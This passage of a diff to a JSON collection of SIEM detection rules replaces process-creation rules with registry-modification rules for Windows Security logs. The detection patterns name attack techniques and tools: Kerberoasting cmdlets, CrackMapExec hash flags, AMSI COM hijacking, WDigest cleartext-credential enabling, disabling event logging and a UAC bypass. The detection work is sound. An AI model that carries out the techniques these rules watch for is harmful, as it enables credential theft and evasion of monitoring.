'%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((NewValue LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR NewValue LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpview.yml" + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "UEFI Persistence Via Wpbbin - ProcessCreation", - "id": "4abc0ec4-db5a-412f-9632-26659cddf145", - "status": "experimental", - "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DHCP Callout DLL Installation", + "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "status": "test", + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "author": "Dimitrios Slamaris", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1542.001" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wpbbin_potential_persistence.yml" + "filename": "registry_set_dhcp_calloutdll.yml" }, { - "title": "Suspicious PowerShell Command Line", - "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", - "status": "test", - "description": "Detects the PowerShell command lines with special characters", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "title": "Potential EventLog File Location Tampering", + "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", + "status": "experimental", + "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", + "author": "D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT (ParentProcessName LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*' AND (CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (NewValue LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" + "filename": "registry_set_evtx_file_key_tamper.yml" }, { - "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", - "id": "b66474aa-bd92-4333-a16c-298155b120df", - "status": "experimental", - "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", - "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", + "title": "Wdigest Enable UseLogonCredential", + "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "status": "test", + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_schtasks_powershell_persistence.yml" + "filename": "registry_set_wdigest_enable_uselogoncredential.yml" }, { - "title": "Suspicious Kernel Dump Using Dtrace", - "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", + "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", + "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", "status": "test", - "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "tags": [ + "attack.persistence", + "attack.execution", + "attack.defense_evasion", + "attack.t1112" + ], "falsepositives": [ - "Unknown" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.com%' ESCAPE '\\' OR NewValue LIKE '%C:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dtrace_kernel_dump.yml" + "filename": "registry_set_cve_2020_1048_new_printer_port.yml" }, { - "title": "CobaltStrike Process Patterns", - "id": "f35c5d71-b489-4e22-a115-f003df287317", + "title": "UAC Bypass via Event Viewer - Registry Set", + "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "status": "experimental", - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", + "description": "Detects UAC bypass method using Windows event viewer", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%\\\\cmd.exe /C whoami%' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Temp%' ESCAPE '\\') OR ((CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\whoami.exe%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\runonce.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1%' ESCAPE '\\' AND (ParentCommandLine LIKE '%/C whoami%' ESCAPE '\\' OR ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR ParentCommandLine LIKE '%chrome-extension://%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" + "filename": "registry_set_uac_bypass_eventvwr.yml" }, { - "title": "Pingback Backdoor Activity", - "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential AMSI COM Server Hijacking", + "id": "160d2780-31f7-4922-8b3a-efce30e63e96", + "status": "experimental", + "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_pingback_backdoor.yml" + "filename": "registry_set_amsi_com_hijack.yml" }, { - "title": "Mshtml DLL RunHTMLApplication Abuse", - "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", - "status": "experimental", - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Blackbyte Ransomware Registry", + "id": "83314318-052a-4c90-a1ad-660ece38d276", + "status": "test", + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + "filename": "registry_set_blackbyte_ransomware.yml" }, { - "title": "Suspicious Script Execution From Temp Folder", - "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "title": "Disable Windows Event Logging Via Registry", + "id": "2f78da12-f7c7-430b-8b19-a28f269b77a3", "status": "experimental", - "description": "Detects a suspicious script executions from temporary folder", - "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Administrative scripts" + "Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Enabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE '%\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-FileInfoMinifilter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-ASN1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Kernel-AppCompat\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Runtime\\\\Error\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-CAPI2/Operational\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Compat-Appraiser%' ESCAPE '\\'))) AND NOT ((NewProcessName = '') OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_susp_script_exec_from_temp.yml" + "filename": "registry_set_disable_winevt_logging.yml" }, { - "title": "PowerShell Base64 Encoded Reflective Assembly Load", - "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", - "status": "test", - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", + "title": "Change Winevt Event Access Permission Via Registry", + "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", + "status": "experimental", + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027", - "attack.t1620" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (NewValue LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_reflective_assembly_load.yml" + "filename": "registry_set_change_winevt_channelaccess.yml" }, { - "title": "Execute Pcwrun.EXE To Leverage Follina", - "id": "6004abd0-afa4-4557-ba90-49d172e0a299", + "title": "Potential Persistence Via Excel Add-in - Registry", + "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", "status": "experimental", - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND NewValue LIKE '/R %' ESCAPE '\\' AND NewValue LIKE '%.xll' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" + "filename": "registry_set_persistence_xll.yml" }, { - "title": "HackTool - CrackMapExec Execution", - "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", - "status": "test", - "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "author": "Florian Roth (Nextron Systems)", + "title": "Add Debugger Entry To Hangs Key For Persistence", + "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "status": "experimental", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence" + ], "falsepositives": [ - "Unknown" + "This value is not set by default but could be rarly used by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND 